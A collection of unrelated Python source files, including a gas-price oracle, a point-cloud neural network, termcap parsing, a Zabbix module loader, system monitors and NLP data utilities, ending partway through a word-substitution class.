sent_image.remap(data_fb, right=True, upside_down=True)
# diff it with the ref image that has also been undistorted
# (check image_difference_special.py to understand the meaning of the arguments)
sent_image.difference_special(ref_img, data_fb, 25, 40, 100, 200)
interface.loop()
except:
pass
|
413294
|
import numpy as np
import pandas as pd
from ..preprocessing.norm import Normalizer
from ..modeling.model import GruMultiStep
class EthGasPriceOracle:
def __init__(self,
model: GruMultiStep,
training_normalized_dataframe: pd.DataFrame,
scaler: Normalizer,
percentile_value: int = 20):
"""
:param model: GRU model (min gas price target)
:param training_normalized_dataframe: Normalized dataframe used to train the model
:param scaler: Scaler used to train the model
"""
self.model = model
self.scaler = scaler
# Init the min and max slopes from training dataset
predictions = self.model.predict(training_normalized_dataframe, self.scaler,
normalize=False, denormalize=True, use_ground_truth=False)
slopes = self.compute_slopes(predictions)
self.min_slope = min(slopes)
self.max_slope = max(slopes)
print("Slopes fitting done from training set...")
print(f"min slope: {self.min_slope} / max slop: {self.max_slope}")
self.percentile_value = percentile_value
@staticmethod
def compute_slopes(predictions: pd.DataFrame) -> np.ndarray:
predictions = predictions.copy()
t = predictions.shape[1]
slopes = np.empty(len(predictions))
for i in range(len(predictions)):
# We take the first element that is the slope (the second element is the intercept, we drop it)
slope = np.polyfit(np.linspace(0, t, num=t), predictions.iloc[i].values, 1)[0]
slopes[i] = slope
return slopes
def _scale_slope(self, slope):
return (slope - self.min_slope) / (self.max_slope - self.min_slope)
def _get_coeficient(self, slope):
scaled_slop = self._scale_slope(slope)
return np.exp(2 * scaled_slop - 2)
def recommend(self, dataset: pd.DataFrame, urgency: int = 1.0):
predictions = self.model.predict(dataset, self.scaler,
normalize=False, denormalize=True, use_ground_truth=False)
slopes = self.compute_slopes(predictions)
c = self._get_coeficient(slopes)
g = np.percentile(predictions.values, self.percentile_value, axis=1)
res = g * c * urgency
return pd.DataFrame(res, columns=["gas_price_recommendation"], index=predictions.index)
|
413341
|
import tensorflow as tf
import numpy as np
import math
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, '../utils'))
sys.path.append(os.path.join(BASE_DIR, '../../utils'))
sys.path.append(os.path.join(ROOT_DIR, 'tf_ops/sampling'))
import tf_util
from dgcnn_util import get_sampled_edgeconv, get_edgeconv, get_sampled_feature, get_sampled_edgeconv_groupconv, get_edgeconv_groupconv
from tf_sampling import farthest_point_sample, gather_point
def placeholder_inputs(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32, shape=(batch_size))
return pointclouds_pl, labels_pl
def get_model(point_cloud, is_training, bn_decay=None):
""" Classification PointNet, input is BxNx3, output Bx40 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
k = 20
index = farthest_point_sample(512, point_cloud)
# index = tf.random_uniform([batch_size, 512], minval=0, maxval=num_point-1, dtype=tf.int32)
new_point_cloud_1 = gather_point(point_cloud, index)
net = get_sampled_edgeconv_groupconv(point_cloud, new_point_cloud_1, k, [64, 128],
is_training=is_training, bn_decay=bn_decay, scope='layer1', bn=True)
k = 10
sampled_net, new_point_cloud_2 = get_sampled_feature(new_point_cloud_1, net, 128)
net = get_sampled_edgeconv_groupconv(net, sampled_net, k, [128, 256],
is_training=is_training, bn_decay=bn_decay, scope='layer3', bn=True,
sampled_pc=new_point_cloud_2, pc=new_point_cloud_1)
net = get_edgeconv(net, k, [256], is_training=is_training, bn_decay=bn_decay, scope='layer4', bn=True,
associated=[sampled_net, tf.expand_dims(new_point_cloud_2, axis=-2)])
# net = tf_util.conv2d(net, 256, [1, 1], padding='VALID', stride=[1, 1],
# bn=True, is_training=is_training, scope='layer5', bn_decay=bn_decay)
# net = tf_util.conv2d(net, 512, [1, 1], padding='VALID', stride=[1, 1],
# bn=True, is_training=is_training, scope='layer6', bn_decay=bn_decay)
net = tf_util.conv2d(net, 1024, [1, 1], padding='VALID', stride=[1, 1],
bn=True, is_training=is_training, scope='layer7', bn_decay=bn_decay)
net = tf.reduce_max(net, axis=1, keep_dims=True)
# MLP on global point cloud vector
net = tf.reshape(net, [batch_size, -1])
net = tf_util.fully_connected(net, 512, bn=True, is_training=is_training,
scope='fc1', bn_decay=bn_decay)
net = tf_util.dropout(net, keep_prob=0.5, is_training=is_training,
scope='dp1')
net = tf_util.fully_connected(net, 256, bn=True, is_training=is_training,
scope='fc2', bn_decay=bn_decay)
net = tf_util.dropout(net, keep_prob=0.5, is_training=is_training,
scope='dp2')
net = tf_util.fully_connected(net, 40, activation_fn=None, scope='fc3')
return net, end_points
def get_loss(pred, label, end_points):
""" pred: B*NUM_CLASSES,
label: B, """
labels = tf.one_hot(indices=label, depth=40)
loss = tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=pred, label_smoothing=0.2)
classify_loss = tf.reduce_mean(loss)
return classify_loss
if __name__=='__main__':
batch_size = 2
num_pt = 124
pos_dim = 3
input_feed = np.random.rand(batch_size, num_pt, pos_dim)
label_feed = np.random.rand(batch_size)
label_feed[label_feed>=0.5] = 1
label_feed[label_feed<0.5] = 0
label_feed = label_feed.astype(np.int32)
# # np.save('./debug/input_feed.npy', input_feed)
# input_feed = np.load('./debug/input_feed.npy')
# print(input_feed)
with tf.Graph().as_default():
input_pl, label_pl = placeholder_inputs(batch_size, num_pt)
pos, ftr = get_model(input_pl, tf.constant(True))
# loss = get_loss(logits, label_pl, None)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
feed_dict = {input_pl: input_feed, label_pl: label_feed}
res1, res2 = sess.run([pos, ftr], feed_dict=feed_dict)
print(res1.shape)
print(res1)
print(res2.shape)
print(res2)
|
413345
|
from alvi.client.containers import Array
from alvi.client.scenes.base import Scene
class ArrayCreateNode(Scene):
def run(self, **kwargs):
data_generator = kwargs['data_generator']
array = kwargs['container']
array.init(data_generator.quantity())
for i, value in enumerate(data_generator.values):
array[i] = value
array.sync()
@classmethod
def container_class(cls):
return Array
|
413357
|
def get_cityscapes_palette(num_cls=19):
""" Returns the color map for visualizing the segmentation mask.
Args:
num_cls: Number of classes
Returns:
The color map
"""
palette = [0] * (num_cls * 3)
palette[0:3] = (128, 64, 128) # 0: 'road'
palette[3:6] = (244, 35,232) # 1 'sidewalk'
palette[6:9] = (70, 70, 70) # 2''building'
palette[9:12] = (102,102,156) # 3 wall
palette[12:15] = (190,153,153) # 4 fence
palette[15:18] = (153,153,153) # 5 pole
palette[18:21] = (250,170, 30) # 6 'traffic light'
palette[21:24] = (220,220, 0) # 7 'traffic sign'
palette[24:27] = (107,142, 35) # 8 'vegetation'
palette[27:30] = (152,251,152) # 9 'terrain'
palette[30:33] = ( 70,130,180) # 10 sky
palette[33:36] = (220, 20, 60) # 11 person
palette[36:39] = (255, 0, 0) # 12 rider
palette[39:42] = (0, 0, 142) # 13 car
palette[42:45] = (0, 0, 70) # 14 truck
palette[45:48] = (0, 60,100) # 15 bus
palette[48:51] = (0, 80,100) # 16 train
palette[51:54] = (0, 0,230) # 17 'motorcycle'
palette[54:57] = (119, 11, 32) # 18 'bicycle'
palette[57:60] = (105, 105, 105)
return palette
def get_gene_palette(num_cls=182): #Ref: CCNet
""" Returns the color map for visualizing the segmentation mask.
Args:
num_cls: Number of classes
Returns:
The color map
"""
n = num_cls
palette = [0] * (n * 3)
for j in range(0, n):
lab = j
palette[j * 3 + 0] = 0
palette[j * 3 + 1] = 0
palette[j * 3 + 2] = 0
i = 0
while lab:
palette[j * 3 + 0] |= (((lab >> 0) & 1) << (7 - i))
palette[j * 3 + 1] |= (((lab >> 1) & 1) << (7 - i))
palette[j * 3 + 2] |= (((lab >> 2) & 1) << (7 - i))
i += 1
lab >>= 3
return palette
def get_palette(dataset):
if dataset == 'cityscapes':
palette = get_cityscapes_palette(19)
elif dataset == 'pascal_context':
palette = get_gene_palette(num_cls=59)
else:
raise RuntimeError("unkonw dataset :{}".format(dataset))
return palette
|
413411
|
import os
import sys
import os.path as path
from tinydb import TinyDB
sys.path.insert(0, path.abspath(path.join(path.dirname(__file__), '..')))
from models import RoadMap
DB_PATH = path.join(path.dirname(__file__), "../../data/data.json")
if __name__ == "__main__":
db = TinyDB(DB_PATH)
entries = db.all()
print(len(entries))
for entry in entries:
name = entry["name"]
print(name)
r, _ = RoadMap.get_or_create(id=entry["id"], defaults={
"name": "",
"map":"",
"description": ""
})
print(name)
r.name = name
r.map_json = entry["map"]
r.save()
|
413462
|
import sys
# attempt to import zabbix runtime if running embedded
try:
import zabbix_runtime
except ImportError:
zabbix_runtime = None
__version__ = "1.0.0"
__python_version_string = "Python %i.%i.%i-%s" % sys.version_info[:4]
__modules = []
__items = []
__routes = {}
zabbix_module_path = "/usr/lib/zabbix/modules/python%i" % sys.version_info[:1]
item_timeout = 0
# log levels from log.h
LOG_LEVEL_CRIT = 1
LOG_LEVEL_ERR = 2
LOG_LEVEL_WARNING = 3
LOG_LEVEL_DEBUG = 4
LOG_LEVEL_TRACE = 5
LOG_LEVEL_INFORMATION = 127
def log(lvl, msg):
if zabbix_runtime:
zabbix_runtime.log(lvl, msg)
elif lvl == LOG_LEVEL_INFORMATION:
print(msg)
elif lvl <= LOG_LEVEL_WARNING:
sys.stderr.write(msg + "\n")
def info(msg):
log(LOG_LEVEL_INFORMATION, msg)
def trace(msg):
log(LOG_LEVEL_TRACE, msg)
def debug(msg):
log(LOG_LEVEL_DEBUG, msg)
def warning(msg):
log(LOG_LEVEL_WARNING, msg)
def error(msg):
log(LOG_LEVEL_ERR, msg)
def critical(msg):
log(LOG_LEVEL_CRIT, msg)
class TimeoutError(Exception):
"""
TimeoutError should be raised by any agent item handler whose execution
exceeds item_timeout seconds
"""
def __str__(self):
return 'Operation timed out'
class AgentRequest(object):
key = None
params = []
def __init__(self, key, params):
self.key = key
self.params = params
def __str__(self):
return "{0}[{1}]".format(self.key, ','.join(self.params))
class AgentItem(object):
key = None
flags = 0
test_param = None
fn = None
def __init__(self, key, flags = 0, fn = None, test_param = None):
if not key:
raise ValueError("key not given in agent item")
if not fn:
raise ValueError("fn not given in agent item")
# join test_param if list or tuple given
if test_param:
try:
for i, v in enumerate(test_param):
test_param[i] = str(v)
test_param = ','.join(test_param)
except TypeError:
test_param = str(test_param)
self.key = key
self.flags = flags
self.test_param = test_param
self.fn = fn
def __str__(self):
return self.key
def route(request):
"""
Route a request from the Zabbix agent to the Python function associated with
the request key.
"""
debug("routing python request: %s" % request)
try:
return __routes[request.key](request)
except KeyError:
raise ValueError("no function registered for agent item " + request.key)
def version(request):
"""Agent item python.version returns the runtime version string"""
return __python_version_string
def macro_name(key):
"""Converts a string into a Zabbix LLD macro"""
from re import sub
macro = key.upper() # uppercase
macro = sub(r'[\s_-]+', '_', macro) # replace whitespace with underscore
macro = sub(r'[^a-zA-Z_]+', '', macro) # strip illegal chars
macro = sub(r'[_]+', '_', macro) # reduce duplicates
macro = ('{#' + macro + '}') # encapsulate in {#}
return macro
def discovery(data):
"""Converts a Python dict into a Zabbix LLD JSON string"""
from json import JSONEncoder
lld_data = { 'data': [] }
for item in data:
lld_item = {}
for key, val in item.items():
if val:
lld_item[macro_name(key)] = str(val)
if lld_item:
lld_data['data'].append(lld_item)
return JSONEncoder().encode(lld_data)
def register_item(item):
"""Registers an AgentItem for use in the parent Zabbix process"""
debug("registering item %s" % item.key)
__items.append(item)
__routes[item.key] = item.fn
return item
def register_module_items(mod):
"""
Retrieves a list of AgentItems by calling zbx_module_item_list in the given
module, if it exists. Each item is then registered for use in the parent
Zabbix process.
"""
if isinstance(mod, str):
mod = sys.modules[mod]
debug("calling %s.zbx_module_item_list" % mod.__name__)
try:
newitems = mod.zbx_module_item_list()
try:
for item in newitems:
register_item(item)
except TypeError:
# newitems is probably a single item
register_item(newitems)
except AttributeError:
# module does not define zbx_module_item_list
newitems = []
return newitems
def register_module(mod):
"""
Initializes the given module by calling its zbx_module_init function, if it
exists. Any AgentItems in the module are then registered via
register_module_items.
"""
# import module
debug("registering module: %s" % mod)
if isinstance(mod, str):
mod = __import__(mod)
__modules.append(mod)
# init module
try:
debug("calling %s.zbx_module_init" % mod.__name__)
mod.zbx_module_init()
except AttributeError:
pass
# register items
register_module_items(mod)
return mod
def zbx_module_init():
"""
This function is called by the Zabbix runtime when the module is first loaded.
It initializes and registers builtin AgentItems and all modules from the
configured zabbix_module_path.
"""
import glob
import os.path
# ensure module path is in search path
sys.path.insert(0, zabbix_module_path)
# register builtin items
register_item(AgentItem("python.version", fn = version))
# init list of modules to register
mod_names = []
# register installed packages
for path in glob.glob(zabbix_module_path + "/*/__init__.py"):
mod_name = os.path.basename(os.path.split(path)[0])
if mod_name != __name__:
mod_names.append(mod_name)
register_module(mod_name)
# register installed modules
for path in glob.glob(zabbix_module_path + "/*.py"):
filename = os.path.basename(path)
mod_name = filename[0:len(filename) - 3]
if mod_name != __name__:
mod_names.append(filename)
register_module(mod_name)
# log loaded modules
if mod_names:
info("loaded python modules: %s" % ", ".join(mod_names))
def zbx_module_item_list():
"""
This function is called by the Zabbix runtime and returns all registered
AgentItems for use in the parent Zabbix process.
"""
return __items
|
413486
|
import logging
import re
import sys
class Cap:
def __init__(self):
self.flags = {}
self.cmds = {}
self.control_data_start_state = ControlDataState()
def parse_cap(cap_str):
cap = Cap()
for field in cap_str.split(':'):
if len(field) == 0:
continue
if field.find('=') > 0:
cap.cmds.update(parse_str_cap(field, cap.control_data_start_state))
elif field.find('#') > 0:
parts = field.split('#')
cap.flags.update({parts[0]:int(parts[1])})
else:
cap.flags.update({field:1})
return cap
class ControlDataParserContext:
def __init__(self):
self.params = []
def push_param(self, param):
self.params.append(param)
class ControlDataState:
def __init__(self):
self.cap_name = {}
self.next_states = {}
self.digit_state = None
def add_state(self, c, state):
if c in self.next_states:
return self.next_states[c]
self.next_states[c] = state
return state
def add_digit_state(self, state):
if self.digit_state:
return self.digit_state
self.digit_state = state
return state
def handle(self, context, c):
if c in self.next_states:
return self.next_states[c]
return self.digit_state.handle(context, c) if self.digit_state else None
def get_cap(self, params):
if len(params) == 0:
return self.cap_name[''] if '' in self.cap_name else None
str_match = ','.join([str(x) for x in params])
if str_match in self.cap_name:
return self.cap_name[str_match]
for k in sorted(self.cap_name, key=lambda v: str(v.count('*')) + v):
if k.find('*') < 0:
if k == str_match:
return self.cap_name[k]
else:
continue
re_str = k.replace(',**','(,[0-9]+)?')
re_str = re_str.replace('**','([0-9]+)?')
re_str = re_str.replace('*', '[0-9]+')
re_str = re_str.replace('?', '*')
if re.match(re_str, str_match):
return self.cap_name[k]
return None
class DigitState(ControlDataState):
def __init__(self):
ControlDataState.__init__(self)
self.digit_base = 10
self.digits = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
self.value = None
def handle(self, context, cc):
c = cc.upper()
if c in self.digits[:self.digit_base]:
self.value = self.value * self.digit_base + self.digits.index(c) if self.value else self.digits.index(c)
return self
else:
if self.value is not None:
context.push_param(self.value)
self.value = None
return ControlDataState.handle(self, context, cc)
class CapStringValue:
def __init__(self):
self.padding = 0.0
self.value = ''
self.name = ''
def __str__(self):
return ','.join([self.name, str(self.padding), self.value])
def __repr__(self):
return self.__str__()
def parse_padding(value):
padding = 0.0
pos = 0
if value[0].isdigit():
padding_chars = []
has_dot = False
for pos in range(len(value)):
if value[pos] == '*':
if len(padding_chars) > 0:
padding_chars.append('*')
pos += 1
break
elif value[pos] == '.':
if has_dot:
break
has_dot = True
padding_chars.append('.')
elif value[pos].isdigit():
padding_chars.append(value[pos])
else:
break
#end for
try:
padding = 0.0
if padding_chars[-1] == '*':
padding = float(''.join(padding_chars[:-1]))
else:
padding = float(''.join(padding_chars))
except ValueError:
pass
return (pos, padding)
def build_parser_state_machine(cap_str_value, start_state):
value = cap_str_value.value
pos = 0
cur_state = start_state
repeat_state = None
repeat_char = None
is_repeat_state = False
repeat_enter_state = None
increase_param = False
is_digit_state = False
digit_base = 10
params = []
cap_value = []
while pos <len(value):
c = value[pos]
if c == '\\':
pos += 1
if pos >= len(value):
raise ValueError("Unterminaled str")
c = value[pos]
if c == 'E':
c = chr(0x1B)
elif c == '\\':
c = '\\'
elif c == '(':
is_repeat_state = True
repeat_enter_state = cur_state
pos += 1
continue
elif c == ')':
if not repeat_state or not repeat_char:
raise ValueError("Invalid repeat state:" + str(pos) + "," + value)
cur_state.add_state(repeat_char, repeat_state)
repeat_char = None
repeat_state = None
is_repeat_state = False
pos += 1
continue
elif c.isdigit():
v = 0
while pos < len(value) and c.isdigit():
v = v * 8 + int(c)
pos += 1
if pos < len(value):
c = value[pos]
if not c.isdigit():
pos -= 1
c = chr(v)
else:
raise ValueError("unknown escape string:" + c + "," + str(pos) + "," + value)
elif c == '^':
pos += 1
if pos >= len(value):
raise ValueError("Unterminaled str")
c = chr(ord(value[pos]) - ord('A') + 1)
elif c == '%':
pos += 1
if pos >= len(value):
raise ValueError("Unterminaled str")
c = value[pos]
if c == '%':
c = '%'
elif c == 'i':
increase_param = True
pos += 1
continue
elif c == 'd':
is_digit_state = True
digit_base = 10
elif c == 'X' or c == 'x':
is_digit_state = True
digit_base = 16
else:
raise ValueError('unknown format string:' + c + "," + str(pos) + "," + value)
elif c.isdigit():
v = 0
while pos < len(value) and c.isdigit():
v = v * 10 + int(c)
pos += 1
if pos < len(value):
c = value[pos]
if not c.isdigit():
#restore the last digit
pos -= 1
#include all digit char into cap_value
c = str(v)
#save the params
params.append(str(v))
#build state with c
if is_digit_state:
cur_state = cur_state.add_digit_state(DigitState())
cur_state.digit_base = digit_base
#save the params
if is_repeat_state:
params.append('**')
else:
params.append('*')
elif c.isdigit():
cur_state = cur_state.add_digit_state(DigitState())
cap_value.append(c)
else:
cur_state = cur_state.add_state(c, ControlDataState())
cap_value.append(c)
if is_repeat_state and not repeat_state:
repeat_state = cur_state
repeat_char = c
if not is_repeat_state and repeat_enter_state:
old_cur_state = cur_state
cur_state = repeat_enter_state.add_state(c, cur_state)
if cur_state != old_cur_state:
#merge the state
logging.error('should put generic pattern before special pattern')
sys.exit(1)
repeat_enter_state = None
is_digit_state = False
pos += 1
return (cur_state, params, increase_param, ''.join(cap_value))
def parse_str_cap(field, start_state):
cap_str_value = CapStringValue()
parts = field.split('=')
cap_str_value.name = parts[0]
value = cap_str_value.value = '='.join(parts[1:])
#padding
pos, cap_str_value.padding = parse_padding(value)
#build the parser state machine
value = cap_str_value.value = value[pos:]
cap_state, params, increase_param, cap_str_value.cap_value = build_parser_state_machine(cap_str_value, start_state)
cap_name_key = ','.join(params)
if cap_name_key in cap_state.cap_name:
e_name, e_inc_param = cap_state.cap_name[cap_name_key]
if (e_name != cap_str_value.name) or (e_inc_param != increase_param):
raise ValueError('same parameter for different cap name:[' + cap_name_key + '],' + cap_str_value.name)
cap_state.cap_name[cap_name_key] = (cap_str_value.name, increase_param)
return {parts[0]:cap_str_value}
if __name__ == '__main__':
import read_termdata
cap_str = read_termdata.get_entry(sys.argv[1], 'xterm-256color')
cap1 = cap = parse_cap(cap_str)
print cap.flags, cap.cmds
cap = parse_cap(":cm=1.3*\E")
print cap.flags, cap.cmds
cap = parse_cap(":cm=1a.a.3*\E")
print cap.flags, cap.cmds
context = ControlDataParserContext()
state = cap1.control_data_start_state
next_state = None
def try_parse(v):
state = cap1.control_data_start_state
next_state = None
context.params = []
for c in v:
next_state = state.handle(context, c)
if not next_state or state.get_cap(context.params):
break
print 'next state:', c, next_state.next_states
state = next_state
print state.cap_name, context.params
print 'matched cap:', state.get_cap(context.params), state.next_states
# try_parse('\x1B[10;15H')
# try_parse('\x1B[1;2H')
# try_parse('\x1B[10;15R')
# try_parse('\x1B[1;4R')
# try_parse('^H')
# try_parse('^H100')
# try_parse('^100H100')
# try_parse('\x1B]0;')
# try_parse('\x1B[97m')
# try_parse('\x1B[1;34m')
try_parse('\x1B[?1h\x1B=\x1B')
try_parse('\x1B[?1034h\x1B=\x1B')
|
413491
|
import collections
import numpy as np
from glob import glob
from collections import defaultdict
def _split_tags(tag):
res = []
# t1|t2|t3-t4|t5|t6
# to t1-t4, t1-t5, t1-t6, t2-t4, t2-t5, t2-t6, t3-t4, t3-t5, t3-t6
tags = tag.split('-')
assert(len(tags) <= 2), tag + ' has more than 2 parts'
if len(tags) == 1:
return tags[0].split('|')
t1s = tags[0].split('|')
t2s = tags[1].split('|')
for t1 in t1s:
for t2 in t2s:
t = t1+'-'+t2
_fill_dicts(None, t)
res.append(t)
return res
def _atomize(seq):
res = []
r = [[]]
for item in seq:
tags = _split_tags(item[1])
r *= len(tags)
for t in tags:
for seq in r:
seq.append((item[0], t))
res += r
return res
def _merge(parsed):
merged = []
for seq in parsed:
merged += seq
return merged
class Reader(object):
def __init__(self, atomize=True, split=0.9):
self.START = ('**start**', 'START')
self.END = ('**end**', 'END')
self.PAD = ('**pad**', 'PAD')
self.seed = 42
self.atomize = atomize
self.split = split
self.maxlen = -1
self.ignore_ids = None
def _pad(self, parsed):
buckets = np.percentile([len(s) for s in parsed], range(0, 101, 10))
self.maxlen = int(buckets[-2]) # 90 percentile.
print('pad all sentences to', self.maxlen)
res = []
for seq in parsed:
if len(seq) > self.maxlen:
continue
res.append(seq + [self.PAD] * (self.maxlen - len(seq)))
return res
def _raw_parse(self, docs):
# import re
parsed = []
for doc in docs:
with open(doc, 'r') as f:
seq = [self.START]
for line in f:
# line = line.translate(str.maketrans('', ''), '[]')
line = line.translate({ord(c): None for c in '[]'})
# line = re.sub("\[]", '', line)
# Empty line.
if len(line) == 0:
continue
# Stop sequence line.
if line.strip() == len(line.strip()) * '=':
if len(seq) > 1:
seq.append(self.END); parsed.append(seq)
seq = [self.START]
continue
parts = [item.strip().rsplit('/', 1) for item in line.split()]
for p in parts:
if p[1] == 'CD':
p[0] = '**num**'
seq.append((p[0], p[1]))
# End of sequence.
if p[0] in ['.', '?', '!']:
seq.append(self.END); parsed.append(seq)
seq = [self.START]
continue
if len(seq) > 1:
assert parsed[-1][-1] == self.END and seq[0] == self.START
del parsed[-1][-1]; del seq[0]
seq.append(self.END); parsed[-1].extend(seq)
print('extended', parsed[-1])
return parsed
def _build_vocab(self, padded):
# inside function 1/2
def _text_filtered(_dataset, _vocab, desired_vocab_size=20000):
vocab_ordered = list(_vocab)
# zero based indexing and make room for UUUNKKK
count_cutoff = _vocab[vocab_ordered[desired_vocab_size-2]] # get word by its rank and map to its count
word_to_rank = {}
for i in range(len(vocab_ordered)):
word_to_rank[vocab_ordered[i]] = i
for i in range(len(_dataset)):
example = _dataset[i]
for j in range(len(example)):
try:
if _vocab[example[j][0]] >= count_cutoff and word_to_rank[example[j][0]] < desired_vocab_size:
# we need to ensure that other words below the word on the edge of our desired_vocab size
# are not also on the count cutoff
example[j] = (example[j][0], example[j][1])
else:
example[j] = ('UUUNKKK', example[j][1])
except:
example[j] = ('UUUNKKK', example[j][1])
_dataset[i] = example
return _dataset
# inside function 2/2
def _add_unks(dataset):
vocab = {}
# create a counter for each word
for example in dataset: # [[(word, tag), (word, tag), ..., (word, tag)], [...], ..., [...]]
for word in example:
vocab[word[0]] = 0
for example in dataset: # [[(word, tag), (word, tag), ..., (word, tag)], [...], ..., [...]]
for word in example:
vocab[word[0]] += 1
return _text_filtered(
dataset, collections.OrderedDict(sorted(vocab.items(), key=lambda x: x[1], reverse=True)), 20000)
padded = _add_unks(padded)
# merged = _merge(padded)
words, tags = [], []
for example in padded:
for t in example:
if t[0] not in words:
words.append(t[0])
if t[1] not in tags:
tags.append(t[1])
self.word_to_id = dict(zip(words, range(len(words))))
self.tag_to_id = dict(zip(tags, range(len(tags))))
self.ignore_ids = [self.tag_to_id[self.START[1]],
self.tag_to_id[self.END[1]],
self.tag_to_id[self.PAD[1]]]
def _to_ids(self, padded):
res = []
for seq in padded:
s = []
for item in seq:
s.append((self.word_to_id[item[0]], self.tag_to_id[item[1]]))
res.append(s)
return res
def _split_xy(self, padded):
x = np.zeros([len(padded), self.maxlen], dtype=np.int32)
y = np.zeros([len(padded), self.maxlen], dtype=np.int32)
mask = np.ones([len(padded), self.maxlen], dtype=np.bool)
for i, seq in enumerate(padded):
x[i], y[i] = map(np.asarray, zip(*seq))
for ignored in self.ignore_ids:
mask = np.logical_and(mask, y != ignored)
return x, y, mask
def _get_datasets(self, padded, split):
padded = self._to_ids(padded)
train_size = int(len(padded) * split)
train = padded[:train_size]
test = padded[train_size:]
x_train, y_train, mask_train = self._split_xy(train)
x_test, y_test, mask_test = self._split_xy(test)
return x_train, y_train, mask_train, x_test, y_test, mask_test
def get_data(self, docs):
parsed = self._raw_parse(docs)
if self.atomize:
res = []
for seq in parsed:
res += _atomize(seq)
parsed = res
np.random.seed(self.seed)
np.random.shuffle(parsed)
parsed = self._pad(parsed)
self._build_vocab(parsed)
return self._get_datasets(parsed, self.split)
@staticmethod
def iterator(x, y, mask, batch_size):
"""Iterate on the WSJ data.
"""
epoch_size = (len(x)-1) // batch_size
for i in range(epoch_size):
yield (x[i*batch_size:(i+1)*batch_size], y[i*batch_size:(i+1)*batch_size],
mask[i*batch_size:(i+1)*batch_size])
|
413512
|
import os, sys, threading, time
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(CURRENT_DIR, "..", ".."))
import constants
import psutil
import atexit
class Monitor:
def __init__(self):
pass
def warn(self):
pass
def monitor(self):
pass
class CPUMonitor(Monitor):
message = "Your CPU usage is %s percent"
threshold = 80
def __init__(self):
self.running = False
self.warned = False
def warn(self):
truncated = "%d" % (int(self.current_cpu_usage),)
message = CPUMonitor.message % (truncated,)
os.system(constants.DISPLAY_NOTIFICATION % (message,))
def monitor(self):
self.running = True
while self.running:
self.current_cpu_usage = psutil.cpu_percent()
if self.current_cpu_usage > CPUMonitor.threshold:
if not self.warned:
self.warn()
self.warned = True
else:
self.warned = False
time.sleep(1)
def stop(self):
self.running = False
class MemoryMonitor(Monitor):
message = "Your memory usage is %s percent"
threshold = 80
def __init__(self):
self.running = False
self.warned = False
def warn(self):
truncated = "%d" % (int(self.current_mem_usage),)
message = MemoryMonitor.message % (truncated,)
os.system(constants.DISPLAY_NOTIFICATION % (message,))
def monitor(self):
self.running = True
while self.running:
self.current_mem_usage = psutil.virtual_memory()[2]
if self.current_mem_usage > MemoryMonitor.threshold:
if not self.warned:
self.warn()
self.warned = True
else:
self.warned = False
time.sleep(1)
def stop(self):
self.running = False
class TempMonitor(Monitor):
message = "Your temperature usage is %s percent"
threshold = 70
def __init__(self):
self.running = False
self.warned = False
self.temp_file = open("/sys/class/thermal/thermal_zone0/temp", 'r')
def warn(self):
truncated = "%d" % (int(self.current_temp),)
message = MemoryMonitor.message % (truncated,)
os.system(constants.DISPLAY_NOTIFICATION % (message,))
def monitor(self):
self.running = True
while self.running:
self.temp_file.seek(0)
temp_str = self.temp_file.read().strip()
self.current_temp = int(temp_str) / 1000
if self.current_temp > TempMonitor.threshold:
if not self.warned:
self.warn()
self.warned = True
else:
self.warned = False
time.sleep(1)
def stop(self):
self.running = False
self.temp_file.close()
monitor_threads = {}
cpu_mon = None
mem_mon = None
temp_mon = None
def start():
global monitor_threads, cpu_mon, mem_mon, temp_mon
if len(monitor_threads) > 0:
return
cpu_mon = CPUMonitor()
mem_mon = MemoryMonitor()
temp_mon = TempMonitor()
monitor_threads["cpu_mon"] = threading.Thread(target=cpu_mon.monitor)
monitor_threads["mem_mon"] = threading.Thread(target=mem_mon.monitor)
monitor_threads["temp_mon"] = threading.Thread(target=temp_mon.monitor)
for thread in monitor_threads:
monitor_threads[thread].daemon = True
monitor_threads[thread].start()
def stop():
global cpu_mon, mem_mon, temp_mon
cpu_mon.stop()
mem_mon.stop()
temp_mon.stop()
|
413529
|
import pandas as pd
import numpy as np
def Bootstrap(x1,x2,lag,bslength,verbose=True):
'''
Generate bootstrapped data
Input
-----
x1: array-like, serie-1,
x2: array-like, serie-2,
lag: integer, x2's lag,
bslength: integer, output length,
verbose: boolean,
Output
------
A tuple including 2 bootstrapped series x1,x2
'''
total,dtlen = 0,x1.shape[0]-lag
K,L = [],[]
while total<bslength:
if verbose:
print("Generating random blocks:{}/{}({:.1f}%)".format(total,bslength,(total/bslength*100)),end='\r')
K.append(np.random.randint(dtlen-lag,size=10))
L.append(np.random.geometric(p=0.01, size=10))
total+=L[-1].sum()
K,L = np.concatenate(K),np.concatenate(L)
newx1,newx2 = np.concatenate([x1[lag:]]*(L.max()//dtlen+2)),np.concatenate([x2[:dtlen]]*(L.max()//dtlen+2))
x1output,x2output,total = [],[],0
for Ki,Li in zip(K,L):
if verbose:
print("Generating samples:{}/{}({:.1f}%)".format(total,bslength,(total/bslength*100)),end='\r')
if Li==0:continue
x1output.append(newx1[Ki:Ki+Li])
x2output.append(newx2[Ki:Ki+Li])
total+=Li
if total>=bslength:break
if verbose:
print("Generating samples:{}/{}(100%) ".format(total,bslength))
return np.concatenate(x1output)[:bslength],np.concatenate(x2output)[:bslength]
|
413599
|
from .base import WordSubstitute
from ....data_manager import DataManager
from ....exceptions import WordNotInDictionaryException
from ....tags import TAG_English
import pickle
class HowNetSubstitute(WordSubstitute):
TAGS = { TAG_English }
def __init__(self, k = None):
"""
English Sememe-based word substitute based on OpenHowNet.
`[pdf] <https://arxiv.org/pdf/1901.09957.pdf>`__
Args:
k: Top-k results to return. If k is `None`, all results will be returned.
:Data Requirements: :py:data:`.AttackAssist.HownetSubstituteDict`
:Language: english
"""
with open(DataManager.load("AttackAssist.HownetSubstituteDict"),'rb') as fp:
self.dict=pickle.load(fp)
self.k = k
def substitute(self, word: str, pos: str):
